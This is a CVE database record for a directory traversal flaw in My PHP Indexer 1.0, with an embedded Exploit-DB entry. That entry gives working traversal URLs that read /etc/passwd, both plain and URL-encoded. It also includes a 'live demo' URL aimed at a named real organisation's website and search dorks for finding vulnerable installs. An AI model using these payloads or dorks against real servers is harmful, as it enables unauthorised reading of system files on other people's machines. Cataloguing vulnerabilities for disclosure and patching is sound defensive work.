ID CVE-2008-6183 Type cve Reporter cve@mitre.org Modified 2017-09-29T01:33:00
Description
Multiple directory traversal vulnerabilities in index.php in My PHP Indexer 1.0 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) d and (2) f parameters.
{"exploitdb": [{"lastseen": "2016-02-01T01:32:23", "description": "My PHP Indexer 1.0 (index.php) Local File Download Vulnerability. CVE-2008-6183. Webapps exploit for php platform", "published": "2008-10-12T00:00:00", "type": "exploitdb", "title": "My PHP Indexer 1.0 index.php Local File Download Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6183"], "modified": "2008-10-12T00:00:00", "id": "EDB-ID:6740", "href": "https://www.exploit-db.com/exploits/6740/", "sourceData": "# My PHP Indexer 1.0 (index.php) Local File Download Vulnerability\n# url: http://sourceforge.net/projects/myphpindexer/\n#\n# Author: JosS\n# mail: sys-project[at]hotmail[dot]com\n# site: http://spanish-hackers.com\n# team: Spanish Hackers Team - [SHT]\n#\n# This was written for educational purpose. Use it at your own risk.\n# Author will be not responsible for any damage.\n\n-----------------------------------------------\nDepending the server configuration is possible \nthat it doesn't allow us to scale directories.\n-----------------------------------------------\n\nvuln file: index.php\n\nPoC: /index.php?d=[DIR]&f=[FILE]\nExploit: /index.php?d=../../../../../../../../../../../etc/&f=passwd\n /index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/&f=passwd\n\nlive demo:\n[PATH] = ../../../; (%2e%2e%2f%2e%2e%2f%2e%2e%2f)\n[FILE] = index.php;\nhttp://www.bethesda.org.sg/resources/admin/index.php?d=%2e%2e%2f%2e%2e%2f%2e%2e%2f&f=index.php\n\ndork: \"Powered by My PHP Indexer 1.0\"\ndork (2): \"priv8 :P\"\n\n# milw0rm.com [2008-10-12]\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/6740/"}]}